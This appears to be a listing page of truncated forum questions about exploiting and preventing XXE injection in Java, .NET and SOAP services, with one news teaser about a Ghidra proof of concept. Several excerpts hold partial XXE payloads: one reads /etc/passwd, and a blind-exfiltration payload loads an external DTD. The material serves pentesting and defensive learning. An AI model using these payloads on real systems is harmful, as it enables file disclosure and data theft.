XXE Exploitation
I just want a little help, I'm not able to exploit an XXE.
<?xml version="1.0" encoding="UTF-8"?>
<response>
<list>
<listname><![CDATA[h]]><!ELEMENT r ANY ><!ENTITY sp SYSTEM "file:///e… Continue reading XXE Exploitation
I found out that an endpoint of a website may be vulnerable to XXE. It is using Unmarshal as an XML parser. When I try to send a post request using common XXE payloads, I receive the following response from the server:
[org.xml.sax.SAXPa… Continue reading Can XXE be exploited when disallow-doctype-decl is set to true (Apache)?
Researchers have released a proof-of-concept showing how a XXE vulnerability can be exploited to attack Ghidra project users. Continue reading Researcher Says NSA’s Ghidra Tool Can Be Used for RCE
Is it possible to do any type of XXE in a service developed using default C# SOAP service framework?
I ask because any type of XXE payload I try to add, even XML header, whatever I add before SOAP envelope, I get 400 bad re… Continue reading ASP.NET SOAP Service XXE
I'm trying to extract binary data from a Tomcat server that is using SAXParser. For my FTP server, I am using this source. I'm hosting two DTDs on GitHub Gist. These are their contents:
Base XML (What gets sent to the server):
<?xml … Continue reading Exfiltration through FTP using XXE on a Tomcat server
During a pentest engagement, I found an XXE vulnerability on a SOAP webservice written in Java, OS is Windows Server and I'm trying to demonstrate how serious the vulnerability is. The problem is, I can only read well format… Continue reading javax.xml.* XXE Exploitation
A proper blind XXE payload is:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
File stored on http://127.0.0… Continue reading Why do we need External dtd in blind XXE?
So I'm on an engagement and discovered an XXE injection point in a peculiar place on an ASP.NET app that I can't seem to get my head around. One of the post parameters controls what "form" the rest of the data is sent to, and … Continue reading XXE injection in root node of XML document
Is the .NET method XmlSerializer.Deserialize(TextReader) safe from XML vulnerabilities (XXE, XmlBomb etc..)? Will the DTD be processed during deserialization?
I can understand why XmlSerializer.Deserialize(XmlTextReader) can… Continue reading Is .NET XmlSerializer.Deserialize(TextReader) safe?
I'm following this article and it says
SYSTEM and PUBLIC are practically synonyms
So I created an example like this
<?xml version="1.0" encoding="UTF-7"?>
<!DOCTYPE root [
<!ENTITY foo PUBLIC "file:///etc/pass… Continue reading XXE: SYSTEM and PUBLIC are practically synonyms?